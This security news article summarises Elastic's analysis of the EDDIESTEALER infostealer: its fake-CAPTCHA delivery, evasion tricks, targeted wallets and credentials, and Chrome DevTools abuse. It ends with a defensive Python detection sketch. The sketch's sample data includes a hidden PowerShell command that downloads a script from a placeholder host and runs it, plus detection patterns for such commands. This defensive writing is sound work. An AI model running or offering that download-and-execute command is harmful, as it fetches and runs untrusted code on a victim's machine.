
Elastic Security Labs has published a revealing report on EDDIESTEALER, a new Rust-based malware that poses a stealthy threat to Windows systems: it uses deceptive fake CAPTCHA pages to deliver a powerful infostealer targeting crypto wallets, browser data, credentials, and messaging apps.
EDDIESTEALER is a Rust-based commodity infostealer capable of:
- Harvesting credentials from browsers and password managers
- Targeting crypto wallets like Electrum, Exodus, and Guarda
- Stealing data from FTP clients and messaging apps like Telegram
- Leveraging Chrome DevTools Protocol to extract saved passwords
- Sending encrypted data via multiple task-specific POST requests to a C2 server
What makes EDDIESTEALER distinct is its use of Rust, which offers “enhanced stealth, stability, and resilience against traditional analysis workflows,” Elastic notes.
EDDIESTEALER’s infection chain is as clever as it is effective:
- Users are shown a fake reCAPTCHA interface embedded in a compromised site.
- A JavaScript trick copies a malicious PowerShell command to the user’s clipboard.
- Victims are instructed to run it using Windows + R, unknowingly downloading and executing the malware.
“This command silently downloads a second-stage payload… and executes gverify.js using cscript in a hidden window,” the report explains.
EDDIESTEALER exhibits a range of advanced techniques:
- Encrypted strings using XOR and custom key derivation routines
- API obfuscation via custom WinAPI resolution
- Anti-analysis through memory checks and mutex creation
- Self-deletion using NTFS Alternate Data Streams renaming, inspired by LATRODECTUS
“EDDIESTEALER performs a quick check… If the check fails, it deletes itself from disk,” Elastic reports, detailing its rudimentary sandbox detection.
Additionally, its C2 traffic is highly structured. It uses Base64 encoding and AES-CBC encryption to transmit configuration data and exfiltrated content.
EDDIESTEALER is configured via C2 to exfiltrate a range of sensitive data:
- Crypto Wallets: Exodus, Electrum, DashCore, Daedalus
- Browsers: Chrome, Edge, Firefox, Brave
- Password Managers: Bitwarden, 1Password, KeePass
- FTP Clients: FileZilla, Auto FTP Manager, FTPGetter
- Messaging Apps: Telegram
“The decrypted configuration for this sample contains the following in JSON format: session ID, task list, and AES key,” Elastic explains.
Analyzing EDDIESTEALER is no easy feat. Rust’s memory safety and type system make static analysis more complex.
“A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart,” Elastic points out.
The researchers utilized tools like rustbinsign, Binary Ninja UIDF, and Unicorn Engine to decrypt strings, reconstruct logic, and interpret memory-safe constructs.
EDDIESTEALER doesn’t stop at local files. It also:
- Launches Chrome with --remote-debugging-port
- Uses WebSockets to open chrome://password-manager/passwords
- Scans Chrome process memory to extract credentials
“This behavior is exploited… where it scans the Chrome process memory to extract plaintext credentials after they have been loaded by the browser,” Elastic reveals.
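As an added illustration (my own sketch, not part of Elastic's report or its detection rules), the following Python scans constructed process-creation events for the host-side artefacts described in the infection chain and the DevTools abuse above: a hidden PowerShell download command like the one pasted via Windows + R, cscript executing a .js such as gverify.js from a temp path, and Chrome launched with --remote-debugging-port. The event field layout and the sample command lines are assumptions.

```python
# Added example (mine, not Elastic's detection logic): scan constructed
# process-creation events for the host-side signals the article describes:
# a hidden PowerShell download, cscript.exe running a .js from a temp path,
# and a browser started with --remote-debugging-port. Field layout is an
# assumed, simplified subset of a Sysmon Event ID 1 record.
import re
from typing import List, Tuple

# Constructed sample events (parent image, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -c "iwr http://example.invalid/x -OutFile $env:TEMP\\gverify.js; cscript $env:TEMP\\gverify.js"'),
    ("powershell.exe", "cscript.exe", "cscript //nologo C:\\Users\\u\\AppData\\Local\\Temp\\gverify.js"),
    ("svchost.exe", "chrome.exe", '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9222'),
    ("explorer.exe", "chrome.exe", '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default'),
    ("cmd.exe", "cscript.exe", "cscript //nologo C:\\Scripts\\logon.vbs"),
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden")
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|curl)\b")
JS_IN_TEMP = re.compile(r"\\(temp|appdata)\\.*\.js\b")

def classify(parent: str, image: str, cmdline: str) -> List[str]:
    """Return the names of every signal the event matches (empty list if none)."""
    parent, image, cl = parent.lower(), image.lower(), cmdline.lower()
    hits = []
    # Signal 1: PowerShell run hidden and fetching content (the lure's pasted command).
    if image in SHELLS and HIDDEN.search(cl) and DOWNLOAD.search(cl):
        hits.append("hidden_powershell_download")
    # Signal 2: a script host, spawned by a shell, executing a .js from a user-writable path.
    if image in SCRIPT_HOSTS and parent in SHELLS and JS_IN_TEMP.search(cl):
        hits.append("script_host_js_from_temp")
    # Signal 3: a Chromium browser launched with the DevTools remote-debugging flag.
    if image in BROWSERS and "--remote-debugging-port" in cl:
        hits.append("browser_remote_debugging")
    return hits

def scan(events) -> List[Tuple[int, List[str]]]:
    """Return (event index, matched signals) for each event that matched anything."""
    out = []
    for i, (parent, image, cl) in enumerate(events):
        hits = classify(parent, image, cl)
        if hits:
            out.append((i, hits))
    return out
```

Each signal on its own is noisy (developers legitimately use the remote-debugging flag), so in practice they are correlated with the parent process, user context and timing rather than alerted on individually.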
Elastic observed multiple variants of EDDIESTEALER, each more evasive:
- Newer versions collect GPU info, CPU details, running processes
- Shift from dynamic AES key delivery to hardcoded encryption
- Preemptive profiling of the host to evade sandboxes
This points to an active and evolving malware campaign with a professional development pipeline.
EDDIESTEALER underscores how modern malware developers leverage Rust, legitimate UX patterns (like CAPTCHAs), and DevTools abuse to remain stealthy and effective.
“We have identified 15 additional samples of EDDIESTEALER through code and infrastructure similarities,” the researchers conclude.
As malware tooling continues to evolve with modern languages and anti-analysis techniques, defenders must also adapt their detection and reverse-engineering strategies accordingly.